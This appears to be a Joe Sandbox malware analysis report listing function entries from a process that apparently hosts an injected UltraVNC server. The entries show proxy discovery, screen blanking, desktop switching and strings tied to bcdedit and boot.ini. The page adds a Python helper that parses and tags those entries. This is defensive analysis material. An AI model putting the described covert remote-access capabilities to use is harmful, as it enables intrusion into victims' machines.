                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                      • String ID: UseRegistry$admin$locdom1
                                                                      • API String ID: 1788981264-2648182776
                                                                      • Opcode ID: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                                      • Instruction ID: 057673f485af0db4113077fda8ce579aae7a6361a5cfb27b2147037615542b67
                                                                      • Opcode Fuzzy Hash: 90366ba7cc0c0a2881363750c1573ef4067fd92e56bfccd46d2f838935763d96
                                                                      • Instruction Fuzzy Hash: 70014C25A1854E81FB61BB38E4B53B5A351EF49B04FC0003BE50DC629ADE3CE548C662
                                                                      APIs
                                                                        • Part of subcall function 00007FF7E507D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7E507D3BB
                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7F8D
                                                                        • Part of subcall function 00007FF7E50C7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7689
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C76DD
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C7722
                                                                        • Part of subcall function 00007FF7E50C77F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7840
                                                                        • Part of subcall function 00007FF7E50C77F0: RegQueryValueExA.ADVAPI32 ref: 00007FF7E50C787D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                      • String ID: UseRegistry$admin$locdom3
                                                                      • API String ID: 1788981264-1943432916
                                                                      • Opcode ID: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                                      • Instruction ID: 1be9c55e445ea2b4be0c3815375e1aa450ca528e07c591ff84a6554e2a9789cf
                                                                      • Opcode Fuzzy Hash: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                                      • Instruction Fuzzy Hash: 49015E25A1854E81FA61FB34B4B13BAE391EF99B04FC00437E50DC659ADE3CE145C672
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFindMode$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2885216544-0
                                                                      • Opcode ID: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                      • Instruction ID: 370f3c4ce269f2cd066d5b8ec976414286e915b68b50d50b4e428a8de09a26eb
                                                                      • Opcode Fuzzy Hash: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                      • Instruction Fuzzy Hash: DE016935B0874986DA609B25B4543AAA361F74DFE0F805231EE6D83798DE3DD8458B10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$Library$FileLoad$DeleteFreeModuleName
                                                                      • String ID: Config$CreateIntegratedPluginInterface$CreatePluginInterface$Description$FreeBuffer$GetParams$Reset$RestoreBuffer$SetParams$Shutdown$Startup$TransformBuffer
                                                                      • API String ID: 1650122287-1031704962
                                                                      • Opcode ID: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                      • Instruction ID: 5a2a75b5337e242b690f611eafd48c38befcc1bc02ef5961323686725cc35137
                                                                      • Opcode Fuzzy Hash: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                      • Instruction Fuzzy Hash: A9811031608A8A81EB21EF20E4643FD63A0FB49F99F845136DD5D87298EF7CD645C721
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Object$Select$Delete$CompatibleCreateIconMetricsSystem$CursorDrawFlushInfoRect
                                                                      • String ID: F
                                                                      • API String ID: 2202639625-1304234792
                                                                      • Opcode ID: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                                      • Instruction ID: 28d5fe7010a77502d525162c360d4022f90b30962fa77cc1d99fe6128045df51
                                                                      • Opcode Fuzzy Hash: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                                      • Instruction Fuzzy Hash: 13C16236A0469A8BE750DF65E558EAE73B9FF48B84F410537EE0983708DF789844CB21
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: Window$MetricsSystem$Long$Load$AddressAdjustClassCreateCursorIconLibraryObjectProcRectRegisterShowStock
• String ID: 0$P$SetLayeredWindowAttributes$blackscreen$user32
• API String ID: 1337014749-2363801694
• Opcode ID: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
• Instruction ID: 525737a7d1a29e6720bf65ceafd487d536a03ab632dcd52f590bc6fcbbbcde25
• Opcode Fuzzy Hash: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
• Instruction Fuzzy Hash: 6E714636608B8686EB20EF15F46476AB3A0FB85F54F90513AD95E83798DF3CD045CB12
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: _wgetenv$freeinet_ntoa$ErrorFreeHeapLast_errnomalloc
• String ID: HTTP_PROXY$SOCKS4_RESOLVE$SOCKS4_SERVER$SOCKS5_RESOLVE$SOCKS5_SERVER$SOCKS_RESOLVE$SOCKS_SERVER$http://
• API String ID: 3609861302-2295524587
• Opcode ID: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
• Instruction ID: ef5082032136ac5392c64d73e9511c99f89015550c92b417316ac36d1cef527a
• Opcode Fuzzy Hash: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
• Instruction Fuzzy Hash: EFA16E25A0968A85FE55BB34E5713B9A390AF54F84FC84437EA0D87799FE3CE441C322
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: DesktopThread$CurrentObjectOpen$DeleteInformationInputInvalidateRectUser
• String ID: Default$vncdesktop.cpp : Break log$vncdesktop.cpp : Driver option disabled $vncdesktop.cpp : Driver option enabled $vncdesktop.cpp : EnableOptimisedBlits Failed$vncdesktop.cpp : InitBitmap Failed$vncdesktop.cpp : InitDesktop Failed$vncdesktop.cpp : InitDesktop...$vncdesktop.cpp : InitVideo driver Called$vncdesktop.cpp : Removing real Dib buffer and replace by driver communication buffer$vncdesktop.cpp : SetPalette Failed$vncdesktop.cpp : SetPixFormat Failed$vncdesktop.cpp : SetPixShift Failed$vncdesktop.cpp : ThunkBitmapInfo Failed$vncdesktop.cpp : no default desktop
• API String ID: 421987145-2663527212
• Opcode ID: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
• Instruction ID: c36656530460564b626b5ad881aa9947d26baa9cae17f3eb3b5746eaf2181768
• Opcode Fuzzy Hash: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
• Instruction Fuzzy Hash: 70A10C71A0868B85FA61BB28E4603F9A350EB84F44FD44437E90EC6299DF7CE549C362
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: PrivateProfileString$EnvironmentVariable$AttributesExecuteFileForegroundShellVersionWindowWrite
• String ID: /boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$eboot$operating systems$runas
• API String ID: 3443580464-3826360582
• Opcode ID: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
• Instruction ID: d581e0f478767c319a47dc33bec81c27e88c4f0a4919594bd58b274980d931ff
• Opcode Fuzzy Hash: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
• Instruction Fuzzy Hash: 18613C35A04B8A99E720DF64F8513E973A0FB48768F801233EA6D866D8EF3CD105C351
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: Free$Globalswscanf$Library$AddressByteCharLoadMultiProcWide
• String ID: 443$P$WinHttpGetIEProxyConfigForCurrentUser$http=$https=$winhttp.dll
• API String ID: 3955186772-955988753
• Opcode ID: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
• Instruction ID: 0127c83b7d96475a763920602842d88a4973185872b221dce2fa432071ca7372
• Opcode Fuzzy Hash: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
• Instruction Fuzzy Hash: 22B1B422A0C78991EB10FB34E4603B9A791FB45B94FD44136EA4D87AC9DF3CD506C722
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: freeinet_ntoa$_errnogetpeernamegetsockname$ErrorFreeHeapLast_invalid_parameter_noinfomalloc
• String ID: <unavailable>$Local loop-back connections are disabled.$vncclient.cpp : loopback connection attempted - client accepted$vncclient.cpp : loopback connection attempted - client rejected
• API String ID: 3199031719-36275550
• Opcode ID: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
• Instruction ID: 92af3cdc1c44095a1571fb98b527b0d40a5f1132a77e01efcb084f14b9f3643b
• Opcode Fuzzy Hash: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
• Instruction Fuzzy Hash: 1E517F2670874A86EA64FB25F4603B9A3A0FF88F84F844036E94D87759DF3CE145C712
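The function entries above are where an analyst confirms what the signatures in the overview only summarise: one function reads HTTP_PROXY / SOCKS*_SERVER environment variables, one pulls the user's IE proxy settings through WinHttpGetIEProxyConfigForCurrentUser, one decides whether a loopback VNC client is accepted, and one touches /boot.ini and bcdedit.exe with a "runas" verb. Reading hundreds of such blocks by hand is slow, so the following is an added triage helper, written for this page and not part of the Joe Sandbox report or the UltraVNC code base. It parses the bullet layout exactly as it appears here (`• Source File:`, `• Associated:`, `• API ID:`, `• String ID:`, ...) into one record per function, strips the "Download File" link text that extraction glued onto the .sdmp names, and tags each record using hand-chosen keyword families. The tag names and keyword lists are my own assumptions, not a Joe Sandbox feature, and the embedded sample is a constructed excerpt of two entries copied from this section.

```python
"""Triage helper for Joe Sandbox 'IDA Plugin' function entries.

Added example for this page, not Joe Sandbox or UltraVNC code. It turns the
'• Key: Value' bullet blocks into one dict per function and tags each one by the
capability its string table reveals.
"""
import re
from typing import Dict, List, Tuple

BULLET = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")
OFFSET = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
LINK_RESIDUE = "Download File"  # link text glued onto .sdmp names by extraction

# Assumption: keyword families and tag names chosen by hand for this sample.
TAG_RULES: Dict[str, Tuple[str, ...]] = {
    "proxy-aware": ("HTTP_PROXY", "SOCKS4_SERVER", "SOCKS5_SERVER", "SOCKS_SERVER",
                    "WinHttpGetIEProxyConfigForCurrentUser"),
    "boot-config-tamper": ("bcdedit.exe", "/boot.ini"),
    "elevation-verb": ("runas",),
    "loopback-policy": ("loopback",),
    "screen-blanking": ("blackscreen", "SetLayeredWindowAttributes"),
    "desktop-switch": ("OpenInputDesktop", "GetUserObjectInformation"),
}


def parse_entries(report_text: str) -> List[Dict]:
    """Split report text into per-function dicts keyed by bullet label."""
    entries: List[Dict] = []
    current = None
    for line in report_text.splitlines():
        m = BULLET.match(line)
        if not m:
            continue  # section headings such as 'APIs' or 'Similarity'
        key, value = m.group(1).strip(), m.group(2).strip()
        if value.endswith(LINK_RESIDUE):
            value = value[: -len(LINK_RESIDUE)].rstrip()
        # 'Source File' opens an entry; a repeated scalar key also means a new
        # entry began (text that starts mid-entry, as this page does).
        if current is None or key == "Source File" or (key != "Associated" and key in current):
            current = {"Associated": []}
            entries.append(current)
        if key == "Associated":
            current["Associated"].append(value)
        else:
            current[key] = value
    return entries


def tag_strings(strings: List[str]) -> List[str]:
    """Return the sorted tag names whose needles occur in any of the strings."""
    return sorted(tag for tag, needles in TAG_RULES.items()
                  if any(n in s for s in strings for n in needles))


def summarize(report_text: str) -> List[Dict]:
    """One compact record per function: module base, opcode id, APIs, tags."""
    out = []
    for e in parse_entries(report_text):
        base = OFFSET.search(e.get("Source File", ""))
        out.append({
            "module_base": base.group(1) if base else None,
            "opcode_id": e.get("Opcode ID", ""),
            "apis": [a for a in e.get("API ID", "").split("$") if a],
            "tags": tag_strings(e.get("String ID", "").split("$")),
        })
    return out


# Constructed excerpt: two entries copied from this section, in page order.
SAMPLE = """\
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: _wgetenv$freeinet_ntoa$ErrorFreeHeapLast_errnomalloc
• String ID: HTTP_PROXY$SOCKS4_RESOLVE$SOCKS4_SERVER$SOCKS5_RESOLVE$SOCKS5_SERVER$SOCKS_RESOLVE$SOCKS_SERVER$http://
• API String ID: 3609861302-2295524587
• Opcode ID: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Similarity
• API ID: PrivateProfileString$EnvironmentVariable$AttributesExecuteFileForegroundShellVersionWindowWrite
• String ID: /boot.ini$SYSTEMDRIVE$SystemRoot$\\system32\\$bcdedit.exe$boot loader$default$eboot$operating systems$runas
• API String ID: 3443580464-3826360582
• Opcode ID: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
"""

if __name__ == "__main__":
    for rec in summarize(SAMPLE):
        print(rec["module_base"], rec["opcode_id"][:12], rec["tags"])
```

Feed it the full report text (the plain-text export of this page) instead of SAMPLE to get one line per function; records sharing a module base come from the same mapped image, so grouping on that field separates the injected UltraVNC server from the host process, and the tags point at the handful of functions worth opening in IDA first.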
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: Desktop$Thread$CloseCurrentErrorInformationInputLastObjectOpenUser
• String ID: vncservice.cpp : !GetUserObjectInformation(inputdesktop$vncservice.cpp : !GetUserObjectInformation(threaddesktop$vncservice.cpp : OpenInputDesktop %i I$vncservice.cpp : OpenInputDesktop II$vncservice.cpp : failed to close input desktop$vncservice.cpp : threadname, inputname differ
• API String ID: 55935355-432259686
• Opcode ID: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
• Instruction ID: 4f779c38e57cfc9fb890e2240c6967f4b0889570ac571efbee72a558253a9de0
